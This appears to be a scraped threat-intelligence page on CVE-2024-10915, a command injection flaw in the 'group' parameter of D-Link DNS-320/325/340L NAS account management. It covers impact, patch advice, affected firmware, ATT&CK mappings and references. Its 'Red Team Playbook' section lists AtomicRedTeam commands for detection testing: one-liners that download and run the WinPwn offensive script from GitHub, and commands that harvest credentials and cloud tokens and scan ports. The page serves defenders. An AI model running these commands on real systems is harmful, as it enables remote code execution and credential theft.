CVE-2024-10915
Overview
This vulnerability is a remote OS command injection affecting the cgi_user_add function within the /cgi-bin/account_mgr.cgi endpoint of D-Link DNS-320 series devices. The root cause lies in improper sanitization of the 'group' parameter, allowing malicious input to be executed as system commands. The affected component is the user management CGI script handling account creation.
Vulnerability Description
A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been rated as critical. Affected by this issue is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument group leads to os command injection. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used.
Impact
An unauthenticated remote attacker can execute arbitrary operating system commands on affected devices by exploiting the command injection flaw in the user addition CGI interface. This allows full compromise of device integrity, confidentiality, and availability, including potential control over network functions and stored data. The attack requires network access to the device's HTTP management interface and has high impact on confidentiality, integrity, and availability as indicated by CVSS vector AV:N/AC:H/PR:N/UI:N/C:H/I:H/A:H.
Solution
Users should apply firmware updates from D-Link that address this vulnerability in DNS-320, DNS-320LW, DNS-325, and DNS-340L models. The vendor’s advisory and patch details are available via https://vuldb.com/?id.283310. It is recommended to update to the fixed firmware version as specified in the advisory to remediate the command injection flaw in /cgi-bin/account_mgr.cgi. No official workarounds are documented in the provided references.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical vulnerability has been identified in specific D-Link network storage devices, particularly in the function responsible for user account management. This flaw resides in the cgi_user_add function of the account management CGI script, where improper handling of the input parameter "group" allows for operating system command injection. Such a vulnerability enables an attacker to execute arbitrary commands on the underlying operating system, potentially leading to unauthorized access, data manipulation, or complete system compromise. The severity of this issue is underscored by its high CVSS score, indicating a significant risk to affected systems.
Exploitation of this vulnerability can occur remotely, which broadens the attack surface considerably. Attackers may craft specially designed requests to the vulnerable CGI endpoint, injecting malicious commands through the "group" parameter. Although the complexity of executing such an attack is rated as high, the public disclosure of the exploit means that it could be leveraged by individuals with varying levels of technical expertise. This scenario poses a serious threat, particularly for organizations that rely on these devices for storing sensitive data, as successful exploitation could lead to unauthorized access to critical information.
The real-world implications of this vulnerability are substantial. Organizations utilizing affected D-Link products may face significant business risks, including data breaches, loss of customer trust, and potential regulatory penalties. The ability for an attacker to execute arbitrary commands could lead to data exfiltration, ransomware deployment, or the establishment of persistent backdoors within the network. The potential for widespread exploitation, especially in environments where these devices are deployed in bulk, amplifies the urgency for immediate remediation.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, they should conduct a thorough inventory of all D-Link devices in use and assess their firmware versions to identify any that are affected. Regular vulnerability scanning and penetration testing can help identify potential weaknesses before they are exploited. Additionally, organizations should apply any available firmware updates from D-Link that address this vulnerability, ensuring that their devices are running the latest, most secure versions. Network segmentation can also be employed to limit the exposure of vulnerable devices, thereby reducing the potential impact of an exploit.
In conclusion, the critical vulnerability in D-Link network storage devices presents a significant threat to organizations that utilize these products. The potential for remote exploitation through command injection underscores the need for immediate action to secure affected systems. By implementing robust detection and mitigation strategies, organizations can safeguard their data and maintain the integrity of their network environments. It is imperative for businesses to remain vigilant and proactive in addressing such vulnerabilities to protect against the evolving landscape of cyber threats.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the critical command injection vulnerability in D-Link DNS-320 series devices. While the overall EPSS score remains stable, the emergence of new telemetry indicating active exploitation attempts signifies a shift from theoretical risk to tangible threat activity. This development elevates the urgency for defenders, as the vulnerability is now demonstrably leveraged in the wild, increasing the likelihood of successful remote compromise. The complexity of exploitation remains high, but the presence of public proof-of-concept code lowers the barrier for adversaries, potentially broadening the attacker base. Consequently, the threat level has intensified from a primarily theoretical concern to an active and credible risk, underscoring the need for heightened monitoring and response readiness.
Affected Products (4)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Dlink | Dns-320 Firmware | All |
cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-320lw Firmware | All |
cpe:2.3:o:dlink:dns-320lw_firmware:*:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-325 Firmware | All |
cpe:2.3:o:dlink:dns-325_firmware:*:*:*:*:*:*:*:*
|
|
|
Dlink | Dns-340l Firmware | All |
cpe:2.3:o:dlink:dns-340l_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (1)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
r0otk3r/CVE-2024-10915
|
r0otk3r | 0 | 0 | 2025-07-11 | View |
Threat Feed
2 eventsSighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-88 | OS Command Injection |
52%
|
High | High | |
| CAPEC-6 | Argument Injection |
51%
|
High | High | |
| CAPEC-43 | Exploiting Multiple Input Interpretation Layers |
48%
|
Medium | High |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-10915 |
| vuldb.com |
GitHub CVE
vdb-entry
technical-description
|
https://vuldb.com/?id.283310 |
| vuldb.com |
GitHub CVE
signature
permissions-required
|
https://vuldb.com/?ctiid.283310 |
| vuldb.com |
GitHub CVE
third-party-advisory
|
https://vuldb.com/?submit.432848 |
| netsecfish.notion.site |
GitHub CVE
exploit
|
https://netsecfish.notion.site/Command-Injection-Vulnerability-in-group-parameter-for-D-Link-NAS-12d6b683e67c803fa1a0c0d236c9a4c5?pvs=4 |
| dlink.com |
GitHub CVE
product
|
https://www.dlink.com/ |